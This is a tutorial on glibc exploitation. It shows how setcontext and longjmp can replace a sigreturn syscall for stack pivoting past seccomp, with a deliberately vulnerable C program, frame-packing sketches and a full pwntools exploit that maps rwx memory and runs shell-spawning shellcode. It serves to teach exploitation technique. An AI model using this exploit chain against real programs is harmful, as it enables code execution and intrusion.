setcontext

Glibc's answer to sigreturn

SROP

SROP (SigReturn Oriented Programming) is a useful technique that allows an attacker to get full control over all the registers, including pc and sp. This is useful for calling arbitrary functions or syscalls with controlled arguments, or stack pivoting for example. Typically you'd do it by:

  • Setting rax/eax to SYS_rt_sigreturn/SYS_sigreturn.

  • Passing a forged SigreturnFrame on the stack.

  • Executing a syscall.

This approach is usually doable with some decent control over the process, such as with a ROP chain that looks something like the following:

|------------------|
|  pop rax ; ret   |
|------------------|
| SYS_rt_sigreturn |
|------------------|
|     syscall      |
|------------------|
|                  |
|  SigreturnFrame  |
|                  |
|------------------|
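
As a rough illustration, the layout above can be packed into bytes with nothing but the standard library. This is only a sketch: the gadget addresses are hypothetical placeholders, the frame is an all-zero stand-in for a real SigreturnFrame, and `build_srop_chain` is a helper name made up for this example.

```python
import struct

SYS_RT_SIGRETURN = 15  # rt_sigreturn syscall number on x86-64 Linux


def build_srop_chain(pop_rax_ret: int, syscall_gadget: int, frame: bytes) -> bytes:
    """Pack: pop rax ; ret | SYS_rt_sigreturn | syscall | SigreturnFrame."""
    chain = struct.pack("<QQQ", pop_rax_ret, SYS_RT_SIGRETURN, syscall_gadget)
    return chain + frame


# Hypothetical gadget addresses and a zeroed 0xf8-byte placeholder frame.
chain = build_srop_chain(0x401234, 0x405678, bytes(0xF8))
```

In a real exploit the frame would come from something like pwntools' SigreturnFrame, and the gadget addresses from the target binary or libc.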

But a technique like SROP would be most useful in cases where we have less control (i.e. when we don't have ROP), as it grants great control over the process (pc control, stack pivoting, argument control, etc.).

Attack scenario

// gcc vuln.c -o vuln -fstack-protector -Wl,-z,relro,-z,now
#include <stdlib.h>
#include <stdio.h>

int main(void) {
    // libc leak
    printf("printf: %p\n", &printf);

    // controlled data
    void *ptr = malloc(0x400);
    printf("ptr: %p\n", ptr);
    fgets(ptr, 0x400, stdin);

    // function call primitive with controlled argument
    void (*func)(void*);
    scanf("%zu", (size_t*)&func);
    getchar();

    func(ptr);
}

Take the totally realistic example above, where you have a function call primitive with a controlled first argument (you can get this in glibc in multiple ways, like __free_hook for example). In most cases, you can overwrite this to system, and free a /bin/sh string, and call it a day.

But it's not always that simple, because seccomp may be in play, and can block execve, so that system doesn't work. Now what?!

The ideal way to bypass seccomp is to get either ROP or shellcode execution. Here we'll focus on getting ROP, but usually with ROP you can get shellcode execution by mmap'ing a new region, or mprotect'ing an existing one. One way to get ROP is by using stack pivoting, and what technique do we know of that can help with stack pivoting? That's right, it's our good pal SROP!

Glibc sigreturn wrapper?

But how do we call a sigreturn syscall? Well, glibc may hold the answers to our prayers. Glibc has implementations of many Linux syscalls, many of which are thin wrappers around the actual syscall.

Searching for sigreturn in the glibc codebase turns up a prototype and a generic implementation that does nothing. While there are some implementations for other architectures, there's nothing for x86. We can also see this when looking at the disassembly.

Bummer! It's a shame too, because it would've fit our attack scenario perfectly, as it takes one argument: a pointer to a sigcontext (aka a SigreturnFrame). Thankfully, however, we don't need sigreturn, as glibc provides two more alternatives: longjmp and setcontext.

longjmp

longjmp is used for non-local gotos, which essentially means you can jump between different points across different functions. The way it works is by:

  1. Using setjmp to save the current execution context to some buffer: the callee-saved registers (which may hold local variables), rbp, rsp, and rip. This first call returns 0 to indicate that the context was just saved.

  2. Elsewhere in the code, there may be a call to longjmp which references the buffer containing the saved stack information. This will restore all the registers that were saved, including rip, meaning it will jump to where the setjmp call returned.

  3. Importantly, in this call to longjmp, you also pass an extra value, which is put into rax, to make it look like setjmp returned something. This value must be non-zero to distinguish it from the initial call to setjmp, so that the code knows it's been jumped to.

An example use case is going up the callstack in the case of some exception, where it would be easier to jump there immediately rather than having many functions in the call stack keep returning errors until you reach the main function. The following is an abstract example of this.

#include <setjmp.h>
#include <stdio.h>

jmp_buf env;

void some_func(void* data) {
    // This could be some function called when executing do_processing
    // And could be far down in the call stack
    ...
    if (some_error)
        longjmp(env, 69);
    ...
}

void do_processing(void* data) {
    /*
    Lots of complicated processing with many nested function calls
    */
    ...
}

void process_data(void* data) {
    // named err rather than errno, which is a macro once <errno.h> is included
    int err = setjmp(env);
    if (err == 0) {
        ...
        do_processing(data);
        ...
    } else {
        printf("Error code %d found\n", err);
    }
}

It's important to note that going down the callstack is undefined behaviour, because that could be jumping to an area of the stack that's been clobbered by stack usage since the creation of the jmp_buf.

How does it work?

Let's dive (or rather jump (you can laugh now)) in and have a closer look at what's happening.

setjmp is effectively a thin wrapper around sigsetjmp, where it sets savesigs to 1 (this isn't too important to us).

Here we see that the callee-saved registers rbx and r12-r15 are saved as-is, but rbp, rsp, and rip (as they were before the call to setjmp) are first mangled (using PTR_MANGLE), then saved to the buffer.

longjmp is fairly similar:

There are a few extra steps, like _longjmp_unwind, which calls some cleanup operations that we won't worry about for now. We can skip to the main function, __longjmp:

And as expected, it restores everything that was saved, and needs to unmangle rbp, rsp, rip.
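
To make the mangling concrete, here is a small sketch of what PTR_MANGLE and its inverse do on x86-64, assuming the usual scheme of XORing with the pointer guard and then rotating left by 0x11 bits. The function names and the guard value are made up for illustration.

```python
MASK64 = (1 << 64) - 1


def rol64(value: int, bits: int) -> int:
    """Rotate a 64-bit value left."""
    value &= MASK64
    return ((value << bits) | (value >> (64 - bits))) & MASK64


def ror64(value: int, bits: int) -> int:
    """Rotate a 64-bit value right."""
    value &= MASK64
    return ((value >> bits) | (value << (64 - bits))) & MASK64


def ptr_mangle(ptr: int, guard: int) -> int:
    # setjmp side: xor with the pointer guard, then rol 0x11
    return rol64(ptr ^ guard, 0x11)


def ptr_demangle(mangled: int, guard: int) -> int:
    # longjmp side: ror 0x11, then xor with the pointer guard
    return ror64(mangled, 0x11) ^ guard


guard = 0x1122334455667788    # hypothetical pointer guard value
target = 0x00007FFFF7E12340   # hypothetical address to store in rip
mangled = ptr_mangle(target, guard)
```

The takeaway is that without the guard, an attacker can't produce a value that demangles to a chosen address.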

Exploitation

So coming back to our attack scenario, longjmp could be a reasonable candidate:

  • One argument which points to a context buffer.

  • Control over important registers: rbp, rsp, rip.

And while you don't have immediate control over other registers like you would in SROP, this level of control is enough to craft a small ROP chain to call a sigreturn syscall (like the one described in the SROP section above). You could also set rax using longjmp if you can control the second argument, rsi, and point rsp directly to a SigreturnFrame.

The main drawback is the fact that it uses pointer mangling, meaning you need to leak/overwrite the pointer guard fs:[0x30]. While this may just be an extra step in some cases, it can be more problematic in cases where you have weaker primitives (like in our example). So, can we do better?
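
As a sketch of what that extra step looks like, suppose the pointer guard is already known, or can be recovered from one mangled pointer whose plain value you know. A fake jmp_buf could then be forged as below. The slot order (rbx, rbp, r12-r15, rsp, rip) is an assumption based on glibc's x86-64 jmp_buf layout, and the helper names and values are hypothetical.

```python
import struct

MASK64 = (1 << 64) - 1


def rol64(v: int, n: int) -> int:
    return ((v << n) | (v >> (64 - n))) & MASK64


def ror64(v: int, n: int) -> int:
    return ((v >> n) | (v << (64 - n))) & MASK64


def recover_guard(mangled: int, plain: int) -> int:
    """Given one mangled pointer and its known plain value, derive the guard."""
    return ror64(mangled, 0x11) ^ plain


def forge_jmp_buf(guard, rip, rsp, rbp=0, rbx=0, r12=0, r13=0, r14=0, r15=0):
    """Pack the eight saved slots; rbp, rsp and rip are stored mangled."""
    def mangle(ptr):
        return rol64(ptr ^ guard, 0x11)
    return struct.pack("<8Q", rbx, mangle(rbp), r12, r13, r14, r15,
                       mangle(rsp), mangle(rip))


guard = 0x0F1E2D3C4B5A6978  # hypothetical leaked pointer guard
fake = forge_jmp_buf(guard, rip=0x401000, rsp=0x7FFD00001000)
```

Note that recover_guard needs both a mangled value and the address it encodes, which is exactly the kind of leak a weak primitive may not give you.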

setcontext

setcontext allows for user-level context switching, and is basically just sigreturn implemented manually in glibc. The usage is similar to longjmp:

  • Use getcontext to save the information of the current context, which includes most registers and some signal information.

  • Use setcontext to return to a previously saved context, starting right after the getcontext call as expected.

However, unlike longjmp, there's no way of distinguishing whether a return from a getcontext call is the first or not, because rax will always be 0 (setcontext/getcontext return 0 on success) and most other registers are restored.

How does it work?

The code for setcontext and getcontext is written in assembly, but is also fairly simple.

getcontext just saves the callee-saved and argument registers, plus rsp and rip, to the structure.

And as you can imagine, setcontext just restores all those registers (plus signal information).

The structure in question is ucontext_t, which is very similar to the Linux kernel's own ucontext structure, which is used for the kernel's implementation of rt_sigreturn.

So if setcontext is just replicating rt_sigreturn, why not just use the syscall?

My best guess is that setcontext isn't a perfect match to rt_sigreturn, as you can't control every register using setcontext, such as rax (forced to be 0) and r10 and r11 (temporary/scratch registers).
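
To make the difference concrete, here is a small sketch that flags which requested registers setcontext would not honor. The register sets are assumptions drawn from the description above (rax, r10 and r11 are not loaded), and `unsupported_by_setcontext` is a hypothetical helper.

```python
# General-purpose registers present in an x86-64 sigreturn frame.
SIGRETURN_REGS = {
    "r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15",
    "rdi", "rsi", "rbp", "rbx", "rdx", "rax", "rcx", "rsp", "rip",
}

# Assumption: setcontext loads everything above except rax (zeroed)
# and the temporaries r10 and r11.
SETCONTEXT_REGS = SIGRETURN_REGS - {"rax", "r10", "r11"}


def unsupported_by_setcontext(regs: dict) -> list:
    """Return the requested register names that setcontext will not load."""
    return sorted(name for name in regs if name not in SETCONTEXT_REGS)


wanted = {"rdi": 0xDEAD000, "rax": 59, "r10": 0x22, "rip": 0x401000}
ignored = unsupported_by_setcontext(wanted)
```

This matters in practice for raw syscalls, which take their fourth argument in r10, whereas libc wrappers such as mmap take it in rcx.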

Interestingly also, most architectures implement it manually, except for a few like sparc64.

Exploitation

Unlike longjmp, we don't need to bypass any pointer mangling, so this is ideal for our attack scenario. In this example, we'll aim to get shellcode execution, which can be done with the use of ROP:

  1. Use mmap to create a rwx memory section.

  2. Read in our own shellcode.

  3. Jump to the shellcode.
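
Steps 2 and 3 could be laid out on the pivoted stack roughly as follows. This is only a sketch: the gadget and function addresses are hypothetical, gets stands in for whichever read primitive is available, and `build_stage2_chain` is a name invented for the example.

```python
import struct


def build_stage2_chain(pop_rdi_ret: int, gets_addr: int, shellcode_addr: int) -> bytes:
    """gets(shellcode_addr), then return straight into the shellcode."""
    return struct.pack(
        "<4Q",
        pop_rdi_ret,     # gadget: pop rdi ; ret
        shellcode_addr,  # rdi = destination inside the rwx mapping
        gets_addr,       # read the shellcode from stdin
        shellcode_addr,  # gets returns here, starting the shellcode
    )


# Hypothetical addresses, for illustration only.
stage2 = build_stage2_chain(0x40123B, 0x7FFFF7E50000, 0xDEAD000)
```

Since gets stops at a newline, the shellcode sent afterwards must not contain a 0x0a byte.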

To craft the ucontext_t, we can actually just use SigreturnFrame in pwntools, because glibc's ucontext_t is basically the same as the kernel's version (at least with the fields we care about).

The structures seem to be the same up to the end of uc_mcontext (which is covered by SigreturnFrame), but afterwards they're slightly different, mainly due to differences in what signal information is stored. We don't usually need to worry about these fields, and neither does SigreturnFrame, so it works well enough for our purposes.
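
For readers without pwntools at hand, the shared part of the layout can be sketched with the standard library alone. The offsets below are assumptions based on the x86-64 layout (uc_mcontext's register array starting at 0x28, and the frame ending at 0xf8), and `build_frame` is a hypothetical stand-in for SigreturnFrame that leaves the fpstate pointer at zero.

```python
import struct

MASK64 = (1 << 64) - 1
FRAME_SIZE = 0xF8  # size of the part covered by SigreturnFrame

# Assumed offsets of the saved registers inside the x86-64 ucontext_t.
GREG_OFFSETS = {
    "r8": 0x28, "r9": 0x30, "r10": 0x38, "r11": 0x40,
    "r12": 0x48, "r13": 0x50, "r14": 0x58, "r15": 0x60,
    "rdi": 0x68, "rsi": 0x70, "rbp": 0x78, "rbx": 0x80,
    "rdx": 0x88, "rax": 0x90, "rcx": 0x98, "rsp": 0xA0, "rip": 0xA8,
}


def build_frame(regs: dict) -> bytes:
    """Write each requested register at its slot; everything else stays zero."""
    buf = bytearray(FRAME_SIZE)
    for name, value in regs.items():
        # Mask so that negative values such as -1 pack as 0xffff...ffff.
        struct.pack_into("<Q", buf, GREG_OFFSETS[name], value & MASK64)
    return bytes(buf)


frame = build_frame({"rdi": 0xDEAD000, "r8": -1, "rsp": 0x7FFD0000, "rip": 0x401000})
```

The rax, r10 and r11 slots exist in the layout, but as noted earlier setcontext won't load them.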

However, unlike typical SROP, we need to specify a pointer to the fpstate. When &fpstate is NULL, sigreturn will ignore fpstate, but since getcontext always populates this field, setcontext assumes it will exist and dereferences it to restore the floating-point state, so a NULL pointer crashes the process.

Any valid pointer should work, as the fields in fpstate probably won't make a difference in most cases, but in this example I'll construct it like getcontext would, meaning it should point to ucontext+0x1a8.

We can construct the fpstate as follows:

fpstate = {
    0x00: p16(0x37f),   # cwd
    0x02: p16(0xffff),  # swd
    0x04: p16(0x0),     # ftw
    0x06: p16(0xffff),  # fop
    0x08: 0xffffffff,   # rip
    0x10: 0x0,          # rdp
    0x18: 0x1f80,       # mxcsr (overlaps with ucontext+0x1c0)
    # 0x1c: mxcsr_mask
    # 0x20: _st[8] (0x10 bytes each)
    # 0xa0: _xmm[16] (0x10 bytes each)
    # 0x1a0: int reserved[24]
    # 0x200: [end]
}
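
The same header can be packed without pwntools, which also makes the offset arithmetic easy to check. This is a sketch under the assumptions stated in the text: the fpstate pointer field sits at 0xe0 in the frame, and the fpstate itself lives at ucontext+0x1a8. `attach_fpstate` is a hypothetical helper.

```python
import struct

FPREGS_PTR_OFFSET = 0xE0  # the "&fpstate" field inside the frame
FPSTATE_OFFSET = 0x1A8    # where getcontext keeps the fpstate


def build_fpstate_header() -> bytes:
    """cwd, swd, ftw, fop (u16 each), rip, rdp (u64), mxcsr, mxcsr_mask (u32)."""
    return struct.pack("<HHHHQQII",
                       0x37F, 0xFFFF, 0x0, 0xFFFF,
                       0xFFFFFFFF, 0x0,
                       0x1F80, 0x0)


def attach_fpstate(frame: bytes, base_addr: int) -> bytes:
    """Pad the frame up to 0x1a8, point &fpstate at it, append the header."""
    buf = bytearray(frame[:FPSTATE_OFFSET].ljust(FPSTATE_OFFSET, b"\x00"))
    struct.pack_into("<Q", buf, FPREGS_PTR_OFFSET, base_addr + FPSTATE_OFFSET)
    return bytes(buf) + build_fpstate_header()


# base_addr is wherever the forged ucontext_t lives (hypothetical here).
payload = attach_fpstate(bytes(0xF8), base_addr=0x55550000)
```

The zero padding between 0xf8 and 0x1a8 also leaves uc_sigmask (at 0x128) cleared.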

Putting all of this together, we can craft the following exploit.

#!/usr/bin/python3
from pwn import *
from sys import argv

e = context.binary = ELF('vuln')
libc = ELF('libc', checksec=False)
ld = ELF('ld', checksec=False)
if len(argv) > 1:
	ip, port = argv[1].split(":")
	conn = lambda: remote(ip, port)
else:
	conn = lambda: e.process()

p = conn()

p.recvuntil(b"printf: ")
printf = int(p.recvline(), 16)
log.info(f"printf: {hex(printf)}")

libc.address = printf - libc.sym.printf
log.info(f"libc: {hex(libc.address)}")

p.recvuntil(b"ptr: ")
ptr = int(p.recvline(), 16)
log.info(f"ptr: {hex(ptr)}")

def setcontext(regs, addr):
	frame = SigreturnFrame()
	for reg, val in regs.items():
		setattr(frame, reg, val)
	# needed to prevent SEGFAULT
	setattr(frame, "&fpstate", addr+0x1a8)
	fpstate = {
	0x00: p16(0x37f),	# cwd
	0x02: p16(0xffff),	# swd
	0x04: p16(0x0),		# ftw
	0x06: p16(0xffff),	# fop
	0x08: 0xffffffff,	# rip
	0x10: 0x0,			# rdp
	0x18: 0x1f80,	    # mxcsr
	# 0x1c: mxcsr_mask
	# 0x20: _st[8] (0x10 bytes each)
	# 0xa0: _xmm[16] (0x10 bytes each)
	# 0x1a0: int reserved[24]
	# 0x200: [end]
	}
	return flat({
	0x00 : bytes(frame),
#	0xf8: 0					# end of SigreturnFrame
	0x128: 0,				# uc_sigmask
	0x1a8: fpstate,			# fpstate
	})

addr = 0xdead000
addr_rop = ptr + len(setcontext({}, 0))

data = setcontext({
	# mmap(addr, 0x1000, rwx, 0x22, -1, 0)
	"rip": libc.sym.mmap,
	"rdi": addr,
	"rsi": 0x1000,
	"rdx": 7,
	"rcx": 0x22,
	"r8": -1,
	"r9": 0,
	# execute rop afterwards
	"rsp": addr_rop
}, ptr)

rop = ROP(libc)
rop.gets(addr)
rop.raw(addr)

data += rop.chain()
#gdb.attach(p)
p.sendline(data)
p.sendline(str(libc.sym.setcontext).encode())

p.sendline(asm(shellcraft.linux.sh()))

p.interactive()
